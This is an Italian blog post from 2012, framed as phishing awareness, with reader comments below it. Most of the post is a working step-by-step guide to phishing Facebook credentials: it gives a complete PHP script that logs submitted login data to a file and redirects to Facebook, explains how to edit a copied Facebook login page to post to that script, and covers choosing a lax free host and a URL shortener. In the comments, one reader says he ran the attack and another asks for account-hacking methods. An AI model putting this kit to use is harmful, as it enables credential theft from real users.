venerdì 26 ottobre 2012

Come vi scoprono la password di Facebook (PHISHING)

Il phishing è un sistema attraverso il quale un aggressore cerca di ingannare la vittima convincendola a fornire informazioni personali sensibili. Ovviamente è una attività illegale , quindi leggete questo articolo solo con l'intenzione di proteggervi e non con lo scopo di diventare voi i truffatori.Generalmente l'attacco avviene in 4 fasi:

1)Creazione di un finto sito, graficamente uguale al sito di cui si vogliono sottrarre le credenziali di accesso alla vittima.
2)Inserire, nel finto sito una script che recupera i dati di login inseriti dalla vittima.
3)Invio di email alla/e vittima/e , con l'invito a collegarsi al sito ,per risolvere alcuni problemi, qui la fantasia dell' aggressore può sbizzarrirsi.
4)Recupero dei dati dal server utilizzato per il fake login.


Il noto social network Facebook è da anni che è sotto mira da parte dei phisher di tutto il mondo, ma non è il solo sito attaccato, i siti maggiormente colpiti sono quelli che offrono servizi finanziari online, come banche,paypal,poste ecc.
Ora vi descriverò come sia estremamente semplice realizzare un attacco di questo genere agli utenti Facebook,
la prima cosa è trovare un server, ovviamente free e che non faccia troppi controlli sull' identità di chi apre l'account, Il web ne è pieno, la cosa importante è che il server deve offrire la possibilità di utilizzare degli script in qualche linguaggio lato server come PHP (ad esempio questo server http://www.000webhost.com/).
La fase successiva consiste nel creare uno script che legge e memorizza in un file i dati del malcapitato e che in seguito lo indirizza al sito originale, nel nostro caso a FaceBook.Esistono degli script già fatti che si trovano nel web , per cui anche questa fase ,purtroppo è alla portata di tutti, un buon esempio è questo:

<?php
/*****************************
Autore : Andrea Buono di << money94tube >>
Script : Fakelogin Facebook

*****************************/
header ('Location:http://it-it.facebook.com/');
$handle = fopen("bottino.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Basta copiarlo in un file di testo e salvarlo col nome "post.php".Ora non resta che copiare la pagina di login di FaceBook in un file html e procedere ad una semplice modifica,si deve cercare il punto del file action="https//www.facebook.com/login.php?login_attempt=1" e sostituirlo con action="post.php".Quindi salvare il file con nome "index.html", e trasferire entrambi i file(post.php e index.html) sul server in cui avete aperto l'account.Ora potete creare una url breve per il sito fake, in quanto FaceBook, non accetta login da molti siti che in passato hanno ospitato siti phishing, come esempio potete creare una url breve qui http://www.dot.tk. Finito!, quando un utente riceve una email, che lo invita ad effettuare il login perché ci sono dei problemi(o altro) i suoi dati saranno scritti sul file bottino.txt. Mi raccomando non abboccate a questo genere di truffe, e controllate sempre se gli effettivi indirizzi corrispondano a quelli del sito originale.

4 commenti:

  1. Io lo fatto ma non e semplice farceli cascare se la vittima e un attimino sveglia seme accorge

    RispondiElimina
    Risposte
    1. Ed è proprio il motivo dell' articolo, fare conoscere la tecnica in modo che ci caschi sempre meno gente:-) Una tecnica più complicata ma molto meno nota è questa che sfrutta la rete wifi e un attacco MITM http://d1966.blogspot.it/2012/11/attacco-man-in-middle-con-pwnstar.html

      Elimina
  2. VI PREGO NON ESISTE UN METODO DOVE SERVE SOLO LO USERNAME E SENZA ENTRARE IN CONTATTO CON LA VITTIMA? SUL WEB E' PIENO DI SITI ONLINE MA SONO FAKE XK QUANDO DEVI FARE DOWNLOAD DELLA PASS TI CHIEDE DI COMPILARE I SONDAGGI O PROVARE A VINCERE PREMI X GUADAGNARCI SOLDI ATTRAVERSO GLI SPONSOR

    RispondiElimina
    Risposte
    1. FaceHack fa così, ti chiede di completare un sondaggio che non so, però funziona!

      Elimina